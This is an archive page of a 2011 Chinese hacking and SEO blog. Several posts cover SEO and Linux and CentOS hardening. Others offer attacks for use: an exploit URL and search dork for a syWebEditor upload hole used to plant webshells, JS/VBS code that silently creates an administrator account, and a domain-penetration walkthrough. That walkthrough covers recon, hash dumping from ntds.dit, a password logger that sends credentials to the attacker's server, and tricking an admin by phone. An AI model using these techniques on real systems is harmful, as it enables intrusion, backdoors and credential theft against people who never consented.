秒杀 SKill'Blog

domain命令不是百度外链的分析

SKill — Mon, 06 Jun 2011 09:42:57 +0800

　　最近百度更新的很变态、又不知道多少站长死在这次更新上、当然度娘的每次更新都是让人很纠结的、但是这次灰常的纠结的说、有木有？好吧、说说这次的目的、就是关于domain命令在google、yahoo等搜索引擎上是一个查询外链的命令、但是在国内巨头百度上、domain命令并不不是百度外链。那这是为什么呢？这里秒杀给你分析下。

　　百度上面的domain命令被很多人认为是“百度外链”,先不多说，放上两张图冲击一下那些喜欢domain的人：

　　这张是domain:www.skhack.com的，毫不相干的出现了有木有！！！

　　继续冲击力更大的：

　　这张是site:www.g.cn的，但出现了莫名其妙的网址有木有！！！

　　为什么，domain难道不是百度外链吗？对了，它其实什么都不是。硬要说的话，与domain:www.skhack.com的搜索结果最相近的命令是：www skhack com,基本等于同时搜索这三个零散的词。（题外话，domain命令有可能是个烂尾工程，因为它尽管没有在百度任何文档中出现过，却的确是高级搜索命令。但无论如何它得到的数据和外链什么的毫无关系）

　　冲击过后开始主题。SEO是一门需要探索未知领域的技术，搜索引擎的黑箱操作规则，需要我们基于搜索引擎原理、数据分析等等手段来慢慢摸索，但更重要的，是具有严谨的逻辑性。这是推导规律所必备的。

　　那么来看看现在很多人是怎么做的吧，先是一些不负责任的砖家声称domain是百度外链，然后一大群人就将此传播并奉为真理–从不去怀疑其真实性。最后有一些好学的SEOer出现了，他们开始推理：因为domain是百度外链，所以可以发现的是，锚文本外链是不被百度收录的（domain近似于直接搜索网址，当然搜不到锚文本链接），所以就有一部分人开始怀疑锚文本外链的作用。

　　看似逻辑挺严谨的，但致命的错误却是犯在了最初的前提上：domain并不是什么外链命令。所以后面的推理，尽管觉得研究精神很可贵，可惜因为大前提的错误，后面一切研究也就全都偏离事实。

　　但也不能说domain命令没有参考价值（没有前后矛盾，待慢慢分解），先来看百度站长俱乐部里面Lee所说过的一段话：

　　我们把问题明确一下：是否能识别和处理纯文本形式的链接（非<a></a>标签）？

　　答案是可以的，搜索引擎的spider需要及时发现和抓取互联网上的链接，至于

　　链接是什么形式，并不重要。也许有一天，我们还可以识别图片里、语音里、

　　视频里或是其它什么形式的链接 :）

　　即是肯定文本形式链接可以引导爬虫的抓取，那它至少具有反向链接的一部分作用。而且根据自己粗略的统计分析，文本形式的反链也较可能是可以传递权重的。

　　所以domain出来的数据也有一定的参考价值，因为文本形式反链的数量能从domain所得到的数据上面有所展现。但这也并不代表我们应该看domain的数据，既然已经明确了自己的需求，和搜索命令的功能的话，完全可以有更好的方法。

　　初始需求：了解整个网站的文本形式的反链数量有多少

　　搜索命令：只需要找到网上出现过多少次完整的文本形式的反链，那么就需要加引号的精确匹配

　　最终方法：搜索“skhack.com”（带引号）

　　（顺带提下，比如skhack.com这样锚文本为URL的超链还是会被一同搜索出来的，这个没办法搞定了）

　　这就是相对严谨的多的方法，这样就可以得到更有参考性的数据。而且因为知道了文本形式反链和超链形式反链是不同的，最终应该结合这两者的数据共同判断。百度不提供超链形式的反链查询（之前文本形式反链的查询也是借助小技巧，并非官方提供），所以如果要获取大致的超链形式反链的数据还是得借助比如siteexplorer.search.yahoo.com此类的工具来进行粗略判断。

　　至于反链数据用作什么用途要见仁见智了，有些人会用来人肉判断某个关键词的竞争度，有些人会将之结合进算法来批量做海量关键词的竞争度分析，此外还有很多很多种可能的用途。数据有没有用，最重要的并非取决于它自身，而是分析数据的人。

　　最后，在秒杀发布的这几篇文章的受众还是挺广的，不知有没有人会看的云里雾里昏头转向但可以说的是，和SERP（搜索结果页面）打交道是合格的SEOer每日必备的事情。如果天天和它打交道，就会知道文中所述不过是基础中的基础罢了。与其或许抱怨文章难以理解，不如稍花些时间静下来打基础，这样会好得多。

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: domain命令不是百度外链的分析

如何才能成为seo高手？

SKill — Mon, 25 Apr 2011 21:38:53 +0800

最近发生很多有趣的故事，比如某xx流氓的黑阔在某风水宝地暴了某黑阔一板砖内幕，好嘛、这让某局激起千层浪啊、当局决定严查此事、至今未果。这不是说当局不给力、只是因为临时性问题、至今给还在互相互掐对方的黑阔时间反省，也或许是想放长线钓大鱼，又或许想给对方一个改过自新的机会（秒杀说虽然这个可能很少 – -！）不过最重要的是、又会来一个扫黑风暴。那些x客要注意拉。

好了，不扯xx互掐门了。给大家扯个和这个话题完全不沾边的话题，如何才能成为seo高手？你知道什么是seo吗？你懂什么是seo吗？你明白seo吗？（秒杀说其实我也不懂）好，既然不懂。那就来看看吧。给大家解释下这个seo高手如何成长的，细细看蛮有xx味道的。大家在细细看吧。

如何才能成为seo高手？

决定你是否能成为SEO高手的最重要的一点是：不仅会装，还要会扯。

当大家都很会扯的时候，高手扯得肯定比你疼，不是他们蛋比较敏感，而是他们的确更用力。

当你说我是SEO时，高手肯定说现在我在做的是SEM。

当你说我是SEM时，高手肯定在说我现在在做MKT。

你怒了：为什么你总走在我前面？高手看着你无辜的眼神：因为你比我先说！

你说我做热词排名，高手说我在做长尾建设。

你说我在群发长尾链接，高手说我在做站内优化。

你在说我在做站内优化，高手说我在做整站架构。

你说我在做整站架构，高手说我在做数据分析。

你说我在做数据分析，高手说我在做流程分析。

你说我也来做流程分析了，高手说我已经在做行为分析了。

你说我在做行为分析了，高手说我在努力提高转化率。

你说我们转化率正在提高，高手说我们的口碑营销已经出效果了。

你怒了：你是不是SEO?高手看着你无辜的眼神：什么是SEO？我早已经忘记了！

于是你得到结论：SEO的最高境界就是忘记SEO！

你说我想做个站，高手说想不重要，做最重要。

你说我做了一个站，高手说有不重要，有排名才重要。

你说我站排名很好，高手说排名好不重要，流量大才重要。

你说我站流量大了，高手说流量大不重要，有盈利才重要。

你说我站日入K刀了，高手说日入K刀不重要，有风投才重要。

你说我站是垃圾站，高手说你之所以做出垃圾站，是你开始没想好。

你终于怒了：你不是说想不重要，做最重要吗？高手看着你无辜的眼神：你难道不知道思想也是分等级的吗？

于是你得到结论：高手扯得蛋的确比你的疼。装，上部是个壮，下部是个衣。所以，你先要有足够的勇气与自信自己是一个高手，然后你还得有一身与看起来像高手的行头。

否则，无论你再会扯，当你蹲在麦当劳外面，把可乐杯放在身前时，核桃说不定刚好路过，就会往杯子里扔硬币的。

你问最后一个问题：为什么你能成为高手?高手看着你无辜的眼神：因为我对错误比较了解，你明白什么是错误吗？

装，是要成本的。扯，是要思想的。SEO，是要实践的。

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: 如何才能成为seo高手？

Linux主机怎么加固？

SKill — Tue, 12 Apr 2011 09:08:27 +0800

众所周知，网络安全是个很重要的课题，而对于Linux这个源代码开放的操作系统是公认的比较安全的系统，一旦Linux系统中发现漏洞Internet上来自世界各地的志愿者会踊跃修补它。然而，系统管理员往往不能及时地得到信息并进行更正，这就给黑客以可乘之机。那么Linux主机怎么加固呢？

其实我们都知道对于这些系统本身的安全漏洞，更多的安全问题是由不当的配置造成的，可以通过适当的配置来防止。本文就是想通过系统管理员的安全配置来加固Linux系统，希望能对广大系统管理员有所帮助。

一、补丁安装
可以使系统版本为最新并解决安全问题。
补丁地址：

http://www.redhat.com/corp/support/errata/

RPM包安装：
# rpm  -Fvh  [文件名]
请慎重对系统打补丁，补丁安装应当先在测试机上完成。补丁安装可能导致系统或摹写服务无法工作正常。
在下载补丁包时，一定要对签名进行核实，防止执行特洛伊木马。
二、帐号、口令策略修改
1. 去除不需要的帐号、修改默认帐号的shell变量：
# userdel lp
# groupdel lp
如果下面这些系统默认帐号不需要的话，建议删除。
lp, sync, shutdown, halt, news, uucp, operator, games, gopher
修改一些系统帐号的shell变量，例如uucp,ftp和news等，还有一些仅仅需要FTP功能的帐号，一定不要给他们设置/bin/bash或者/bin/sh等Shell变量。可以在/etc/passwd中将它们的shell变量设为/bin/false或者/dev/null等，也可以使用usermod -s /dev/null username命令来更改username的shell为/dev/null。
删除系统不需要的默认帐号、更改危险帐号缺省的shell变量。
应当明确系统的角色，避免误删除默认帐号。
2. 使root  PATH环境变量中不包含当前目录“.”：
如果root PATH环境变量中包含当前目录“.”
# vi /etc/profile
去除“:.”部分
防止root执行恶意特洛伊木马，减少安全隐患。
3. 对root为ls、rm设置别名：
查看当前shell：
# echo $SHELL
如果是csh：
# vi ~/.cshrc
如果是bash：
# vi ~/.bashrc
加入
alias ls   ls -aol
alias rm  rm -i
重新登录之后查看是否生效。
为ls设置别名使得root可以清楚的查看文件的属性（包括不可更改等特殊属性）。
为rm设置别名使得root在删除文件时进行确认，避免误操作。
4. 缺省密码长度限制：
防止系统弱口令的存在，减少安全隐患。
# vi /etc/login.defs
把下面这行
PASS_MIN_LEN 5   改为
PASS_MIN_LEN 8
5. 超时自动注销登录：
避免管理员忘记注销登录，减少安全隐患。
在unix系统中root账户是具有最高特权的。如果系统管理员在离开系统之前忘记注销root账户，那将会带来很大的安全隐患，应该让系统自动注销。通过修改账户中“TMOUT”参数，可以实现此功能。TMOUT按秒计算。编辑profile文件（vi /etc/profile），在“HISTFILESIZE=”后面加入下面这行：  TMOUT=300  300，表示300秒，也就是表示5分钟。这样，如果系统中登录的用户在5分钟内都没有动作，那么系统会自动注销这个账户。也可以在个别用户的“.bashrc”文件中添加该值，以便系统对该用户实行特殊的自动注销时间。
改变这项设置后，必须先注销用户，再用该用户登录才能激活这个功能。
6. 限制用户对主机资源的使用：
Linux可以限制用户对主机资源的使用，比如限制用户使用的CPU或内存等，可以有效的防止本地DoS攻击。
# vi /etc/security/limits.conf
如果限制limitu用户组对主机资源的使用，
加入：
@limitu          soft    core            0
@limitu          hard    nproc           30
@limitu          -       maxlogins       5

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: Linux主机怎么加固？

某系统syWebEditor上传漏洞利用

SKill — Mon, 04 Apr 2011 17:16:31 +0800

最近很纠结的看着大陆情况、哎、在秒杀围脖也吵着怎么运营一个良好的讨论氛围、在天朝这个力度下、神马都是浮云啊！！！还是来看看某系统syWebEditor上传漏洞利用方法吧~

关键字：inurl:syWebEditor

EXP:/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%

7C&filePathType=1&filePath=/PhotoFile/ProFile/

poc:http://www.hxhack.com/syWebEditor/Sel_UploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%

7C&filePathType=1&filePath=/PhotoFile/ProFile/

上传解析图片马：如果不变动就是http://www.xxxx.com/PhotoFile/ProFile/马的名字
在这里有一个“自动命名”，这个可以自选

额、这个只是技巧、一个蛋疼的技巧。或许很多都知道了、但、无所谓吧、当作笔记也行吧~！

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: 某系统syWebEditor上传漏洞利用

API添加用户与Shell.Users

SKill — Mon, 28 Mar 2011 08:47:22 +0800

有/无cmd命令行下添加用户的方法:API添加用户与Shell.Users

之前有个xp下利用控制面板的cpl文件留后门，然后又有了用.cpl文件加账号的技术。

今天研究了一下用户控制面板文件nusrmgr.cpl，发现调用的是Shell.Users来加用户，它还同时调用了wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话，这一个Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外，这也可能是一种新的加用户的方法。代码如下：

js:
var o=new ActiveXObject( “Shell.Users” );
z=o.create(”test”) ;
z.changePassword(”123456″,”")
z.setting(”AccountType”)=3;
vbs:
Set o=CreateObject( “Shell.Users” )
Set z=o.create(”test”)
z.changePassword “123456″,””
z.setting(”AccountType”)=3

当然还有狼牙的一个无CMD添加用户小工具

增加新用户并自动添加进Administrators组，不采用net.exe，net1.exe，防止部分机器删除后无法添加成功

使用方法：程序名用户名密码

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: API添加用户与Shell.Users

什么是网络安全_你的安全控制措施有效么？

SKill — Thu, 24 Mar 2011 19:09:53 +0800

什么是网络安全_你的安全控制措施有效么？这个是各大网络信息安全同行的共同话题！那么你知道怎么做吗？下面让我们来看看！
中心思想：思路决定成本和效率，我们的信息安全控制措施应当卓有成效。
段落大意：很多单位钱没少花，活没少干，还是被攻击者搞得很惨，悲剧啊，要调整策略啊。如：
1、对与数据库有不同操作权限需求的WEB页面的独立部署的成本，在某种场合，要远小于对整个系统进行安全检查的成本；
2、多步攻击中第一步以外的防御的成本会小于不断对第一步攻击防御的加强；
=============================================

什么是安全？什么是信息安全？是一个很长时间一直困扰我的问题，一段时间下来，总结一下有以下几种说法：

1、安全：免除了不可接受的损害风险的状态[GB/T 28001-2001]；

2、安全：是一种状态，即通过持续的危险识别和风险管理过程，将人员伤害或财产损失的风险降低至并保持在可接受的水平或其以下[国际民航组织]；

3、信息安全：保持信息的保密性、完整性、可用性；另外也包括例如真实性、可核查性、不可否认性和可靠性等[GB/T 22081-2008]；

4、信息安全是指信息网络的硬件、软件及其系统中的数据受到保护，不受偶然的或者恶意的原因而遭到破坏、更改、泄露，系统连续可靠正常地运行，信息服务不中断；

5、信息安全：是一门涉及计算机科学、网络技术、通信技术、密码技术、信息安全技术、应用数学、数论、信息论等多种学科的综合性学科；

6、信息安全：是攻防的对抗，对某一信息系统当防御方势力强于攻击方势力的状态，就是安全；

7、信息安全：是基于时间的安全，当系统的防御时间>检测到系统被入侵的时间+系统采取响应阻止入侵所用的时间，系统就是安全的；

8、信息安全：是基于成本的安全，当攻击方攻击付出的成本远大于攻击方获得的收益，保护对象就是安全的；

9、信息安全：是风险管理，通过对资产、威胁、控制措施（或脆弱性，我的理解控制措施没做好可不就是脆弱么？呵呵）进行赋值和分析，控制风险到可接受的程度就是安全。

其实至今我也不知道上面的这些说法够不够严谨，够不够全面和完善（欢迎大家积极补充，共同整理哈）。但是不管我领悟还是不领悟，我和论坛上的大部分人一样，是要靠信息安全这个行当吃饭的。

我最想知道的是，在我们的信息安全的各类相关工作中，我们的信息安全控制措施有效么？我们真的达到了安全的状态了么？

举一个可能发生的事件：
一个有足够安全意识及有足够安全成本投入的甲方，在众多乙方的协助下，保护甲方拥有的信息系统。其中某个WEB应用系统是重要资产：
1、每季度众多乙方轮流对此WEB应用系统包含的主机操作系统、数据库、应用容器按照当时甲方安全基线规定的检查列表进行评估加固；
2、每个月各个乙方的高手们还按照甲方的要求，独立的对这个WEB应用进行渗透测试和加固；
3、偶尔乙方们还对这个这个WEB应用的程序本身做做代码审计。
一段时间评估和加固过后，这个针对于这个WEB应用的渗透测试已经很难再出成果了。这个被保护的系统藐似具有了相当高的安全强度。

故事总是很偶然，这个应用系统所采用的第三方插件出了个0DAY，可以在这个WEB应用上获得WEBSHELL。导致系统里面需要保护的文件，系统里需要保密的数据库就全部沦陷，直接被刷库了。

好象一个人闭观修炼N多年，修成绝世武功，结果刚上战场乱箭飞来，瞬间秒杀，太悲剧了。

这个故事说明：安全意识、安全投入、技术水平都不差，但是由于某种原因，安全措施失效了。

大家从做一个安全项目的开始，可能就已经相信这个被保护的资产总有一天会出安全事件。并且我们给自己找了很多合情合理的理由：
1、安全是相对的，没有绝对的安全；
2、0DAY是不能预防的；
3、我们已经尽力了，出了问题谁也没办法；
4、我们有事后应急响应；
……
仿佛只要攻击者拿了WEBSHELL，就没有刷不了的库。因为我们这些人，从来都只在不断加强对攻击入手点的防御。而往往对主机、数据库、应用容器的安全措施又与WEB应用程序的安全措施是相对独立的。（搞主机安全的和渗透测试的不是一拨人，而且缺乏沟通。）

结果做到最后，客观的事实是：我们的安全措施是无效的！

不怪甲方的人认为信息安全工作没什么用，很多乙方的人也认为信息安全看不见摸不到，不体现什么业绩，也就是很多人认为的意义不明显。做的好，就是什么都没发生，做的不好就是出了安全事件，要挨扳子。

那么我们怎么样才能把信息安全工作做得卓有成效呢？我认为可以从以下几个方面入手：
1、信息资产的安全保护能力提升，并控制信息安全实现的发生及其影响；
2、直接的经济价值，如及时发现问题，抓到黑客，挽回了多少经济损失；
3、间接的经济价值，如通过工作方式的改造，提升了信息安全工作效率，降低了成本；
4、工作可量化指标的实现，如发现多少漏洞，打了多少补丁，处理了多少安全事件，对多少人次进行了安全培训等；
5、获得了多少上级单位的认可，比如获得了上级的某项表彰，甲方更容易升职，乙方更容易多拿奖金。（我好恶俗啊~）
……（大家补充吧）

而最能体现信息安全控制措施的成效的，其实第一条信息资产的安全保护能力的提升和控制信息安全事件的发生及其影响。这个做不好，花再多的钱，做再多的渗透和加固，找再多的理由也白搭。

最后弱弱地提示一下：如果做渗透测试的时候实在是进不去了，希望大家换个思路，能不能直接放个WEBSHELL看看一旦失手后的影响，咱们做信息安全工作。对于多步攻击，我们不应该只盯着第一步攻击防御个没完。

本文作者：’ pw 转载请保留！

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: 什么是网络安全_你的安全控制措施有效么？

好喇叭文章页面优化分析

SKill — Fri, 04 Mar 2011 16:45:41 +0800

今天在查询关键词“深圳耳鼻喉医院”的时候，发现好喇叭信息网非常的给力，在这个关键词上有4篇文章上了首页，排名也相当坚挺，如图所示：

好喇叭文章页面优化分析

作为一个SEO从业者，我第一时间对好喇叭网站进行了一些分析，从而了解它排名给力的原因。下面我们来看看好喇叭排名好的原因有哪些。

1．查询外链

用yahoo查询了一下好喇叭的外链，只有7273条，而排在它上面一名的58同城的外链有466873，也就是说好喇叭这个网站在外链并没有优势，接下来我们来看它的内部优化。

2.内部优化

我打开其中一条“治疗耳鼻喉疾病最好的方法就在深圳耳鼻喉医院”信息（http://www.haolaba.com/guangzhou/yiliao/2311460.html）粗看来是一个一般的文章页面，但是查看过源代码后，发现好喇叭在优化布局上做了很多细节的工作。

在代码中，文章的标题一共出现了7次，如下图所示。

对好喇叭网站进行了一些分析

好喇叭文章页面优化分析

接下来我们看看这些布局在页面中的显示和优势。

前三次布局实在Keywords、description、title中，这三个标签在seo中的重要性不言而喻，搜索引擎会对抓取到的网页进行分析，然后对该页作出一个评测，Keywords、description、title都是评测的依据之一。正确使用Keywords、description、titlen可以帮助搜索引擎对网页产生正确的评测。但有些网页没有使用Keywords、description、title并不影响搜素引擎对他的评测，所以排名很好。

文章标题第四次显示是用的<H1>，作为文章的标题出现；

好喇叭文章页面优化分析

大家都知H1标签原意是标题1，他在优化中也是起着，呈现内容结构的一个作用，这样分配的好处把网页整个结构由主到次区分开来，搜索引擎抓取网页的时候就会按着这样的顺序进行抓取索引。但是我们并不是H1到H6都是经常使用的，我们经常使用的只是H1到H3，H4也时常会用到，作为突出网站的关键词，当然你可以选用加粗，也足以突出关键词，搜索引擎也会默认H1标签里面的内容是重要的内容，所以合适的使用H1标签很重要。

第五次布局是文章的末尾，“”关键词” 相关内容”。

第六次布局文章下面的广告图片，利用的是alt标签，因为蜘蛛是不能识别图片内容的，所以需要用alt标签对图片进行解释说明。

第七次布局是在最下方的联系方式，采用的是<strong>标签，Strong标签在HTML语义为强调，表示语气上的强调、加重。与<strong>标签意义相同的标签还有<B>标签，但是从WEB标准上来说，不提倡使用B标签，不过Google的matt曾经说b标签更具有微小的优势，虽然后来修正为和strong标签优势一样。搜索引擎以用户为主，当我们无法判断那个更具有优势的时候，不妨从用户的角度入手。从这一点出发，我想搜索引擎更有可能赋予strong标签较大的权重，大家完全可以做下SEO实验，做两个内容一样的页面，通过B标签和strong标签来对标题或者关键词进行强调，等待收录之后，在各大搜索引擎搜索这个关键词，看那个标签包裹的页面排名更具有优先级别。也确实有可能两个标签的权重完全一样。

最后就是侧边栏每隔一段时间就会跟新一次，这样在搜索引擎看来这个页面是在不断的更新，这样就能很好的保持页面的快照更新和排名。

在以上的分析中我们可以看出，好喇叭网站在文章页面的优化布局上下了很大的功夫，这样布局不但增加了关键词密度，也不妨碍用户体验，合理的使用的了每一个标签，增强了关键词的重要性，提升了页面的竞争力。

但是优化页面代码来提升SEO效果的时候，建议是“一般来说，一个页面，只允许有一个H1标签，H2标签适当可以提高到2个，H3标签可以提高到3个左右。过度地使用heading标签并没有任何好处。”标签在数量上的控制则较为宽松，当然，主要还得以不影响用户体验为主，总不能将所有要优化的主关键词都进行强调吧？strong标签是强调关键词，但是如果使用太多，过犹不及，反而会“冲淡”关键词，甚至使搜索引擎判断为作弊。

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: 好喇叭文章页面优化分析

域渗透

SKill — Mon, 14 Feb 2011 01:33:47 +0800

很多时候我们在渗透的时候几乎都在内网旁注等xx操作,但是你知道吗,其实很多时候我们都进入了一个域,但你知道怎么进行域渗透吗?这里秒杀将为你科普下!

首先还是先简要看一下域的概念吧：
域 (Domain) 是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域之间不但可以按需要相互进行管理，还可以跨网分配文件和打印机等设备资源，使不同的域之间实现网络资源的共享与管理。

域既是 Windows 网络操作系统的逻辑组织单元，也是Internet的逻辑组织单元，在 Windows 网络操作系统中，域是安全边界。域管理员只能管理域的内部，除非其他的域显式地赋予他管理权限，他才能够访问或者管理其他的域；每个域都有自己的安全策略，以及它与其他域的安全信任关系。

通过上述的了解，我们可以知道域管理员的权限是相当大的，域管理员可以通过持有域的登陆票据从而实现对域内各个计算机的远程管理，即有权限登陆任何一台机器。那么在渗透的过程中我们就可以通过某种方式记录下管理员登陆的密码，当然了，这只是其中的一种思路。

获得一台内网或域中的肉鸡之后，先来查看一下当前的网络环境，执行：

net view 即可获得一系列主机名，并且可以通过Ping其机器名得到其IP地址，不过注意到列出的机器名只是在网络结构中有联系的，而不一定就在同一内网或域中。
执行

ipconfig /all 来查看是否存在域环境，倘若存在的话则可以继续执行：

net user /domain 来查看域内都有哪些用户，还可以查看指定域内都有哪些计算机：

net view /domain:testdomain (testdomain 假设为目标的其中一个域) 查看域内的管理员用户则可以执行：

net group “domain admins” /domain 还可以通过命令：

net user domain-admin /domain 查看管理员登陆时间，密码过期时间，是否有登陆脚本，组分配等信息。
一般在正式进攻之前还是多多掌握一些网络的信息为好，可以通过遍历管理员的文件从中获取可能的隐私信息，信息越多越好，其次就是抓取本机的hash值，这里可以用到一个工具：pwdump7.exe

用这个来抓hash很简单，命令行下直接执行即可，将hash导出到文本的命令为：

pwdump7.exe>1.txt 得到hash之后就可以用工具诸如lc5，rainbowcrack，saminside，ophcrack 之类的去破解了，运气好的话能破解出来了就可以利用这个密码尝试登陆内网的其他机器了，当然了，权限到底大不大那只能看运气了。这里还介绍另外一个域渗透中的利器：gsecdump
好处就在于能从域服务器密码存储文件

windows\ntds\ntds.dit 中导出所有域用户hash的工具，并能从活动进程中导出hash。而且只要有一个本地管理员权限利用hash注入能开启域管理员进程，方便域渗透。命令行下的东西，看看说明就知道怎么用了。

还可以通过记录域管理员登陆该主机密码来获取信息，这里用到一个小工具：Winlogon
可以截获登陆本机3389的密码，当然了也可以截获域管理员登陆的密码了，至于如何让域管理员登陆此机，有可能需要一段漫长的等待，或许管理员有个固定的周期来登陆例行检查，或者你也可以制造个谎情来欺骗域管理员的登陆，以前就有哥们冒充服务器管理员给域管理员拨通了电话谎称服务器中了病毒无法清除请他来帮忙，域管理员没来得及多想就登陆进来了，结果可想而知，密码成功被记录！当然了，更多的方法还是要靠大家自己去想了，呵呵。

由于Winlogon只能将密码记录在本机，因为不知道管理员什么时候登陆进来，于是我们可以利用网上有人改造过的可以Asp发信的版本，直接将截获的用户名和密码发送至自己的Asp收信地址了。不过好像仅适用于Win2003系统。

使用方法为：运行 Loader.exe 填入自己的收信地址之后就会生成 CreateServer.exe，将Asp传到服务器，然后在肉鸡上运行密码记录器即可，post.asp 会在你的URL地址下生成key.txt。

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: 域渗透

CENTOS物理安全两招

SKill — Tue, 25 Jan 2011 20:52:50 +0800

本文总结linux安全教程中的物理安全防护方法，其中包含：
1.加密grub.conf文件
第一步：设置密码并且配置grub.conf文件

[root@localhost ~]# grub-md5-crypt          # 加密grub
Password:                               # 输入保护密码
Retype password:                         # 确认密码
$1$hPkTt/$UFKM12zsqtUowEnrz9whP/       # 密码散列，复制下来
You have new mail in /var/spool/mail/root      # 密码成功提示

第二步：配置/etc/grub.conf 密码

[root@localhost ~]# vi /etc/grub.conf          # 编辑grub文件
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title CentOS (2.6.18-194.el5)
        password –md5 $1$hPkTt/$UFKM12zsqtUowEnrz9whP/    # 添加该行，添加散列
        lock                                               # 密码错误就锁定
        root (hd0,0)
        kernel /vmlinuz-2.6.18-194.el5 ro root=/dev/VolGroup00/LogVol00 rhgb quiet
        initrd /initrd-2.6.18-194.el5.img

重启系统后生效
第三步：测试

提示输入密码才能启动系统。
2.vlock锁定终端

[root@localhost ~]# yum install -y vlock            # 安装vlock
[root@localhost ~]# vlock                        # 运行vlock
*** This tty is not a VC (virtual console). ***       # 提示设置，可以修改配置文件修改
*** It may not be securely locked. ***
This TTY is now locked.
Please enter the password to unlock.
root’s Password:                                # 必须输入密码才能进入命令行

ok，简单这两种简单方法解决物理安全问题，当然还有很多问题需要去实验。

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: CENTOS物理安全两招

移除 WordPress 评论者和评论内容链接

SKill — Mon, 24 Jan 2011 14:11:48 +0800

几天不上线垃圾评论就满天飞了,这里秒杀教你移除 WordPress 评论者和评论内容链接.

近期 WordPress Spam 制造者横行，很是嚣张，看似是看了你的文章来个评论，其实他们只是为了得到一个反向链接（Back Links）而已。虽然默认已经 No Follow 了，但是百度这个2B可不识别 No Follow 的，为了保护所有博主的自身利益，你总不想自己辛苦写的博客变成垃圾链接制造厂吧？把下面的代码加到主题文件的 functions.php 里，加在最后一个 ?> 前面，切记自行备份：

function remove_comment_links() {
global $comment;
$url = get_comment_author_url();
$author = get_comment_author();
if ( empty( $url ) || ‘http://’ == $url )
$return = $author;
else
$return = $author;
return $return;
}
add_filter(‘get_comment_author_link’, ‘remove_comment_links’);
remove_filter(‘comment_text’, ‘make_clickable’, 9);

以上代码修改来源：

http://www.catswhocode.com/blog/10-useful-new-wordpress-hacks

http://014.cc/874

原创文章，转载请注明： 转载自秒杀博客

本文链接地址: 移除 WordPress 评论者和评论内容链接

wordpress 3D标签云 -wp-cumulus (1.000)
Widget Logic用法说明 (1.000)

秒杀 SKill'Blog

domain命令不是百度外链的分析

Related Posts

如何才能成为seo高手？

Related Posts

Linux主机怎么加固？

Related Posts

某系统syWebEditor上传漏洞利用

Related Posts

API添加用户与Shell.Users

Related Posts

什么是网络安全_你的安全控制措施有效么？

Related Posts

好喇叭文章页面优化分析

Related Posts

域渗透

Related Posts

CENTOS物理安全两招

Related Posts

移除 WordPress 评论者和评论内容链接

Related Posts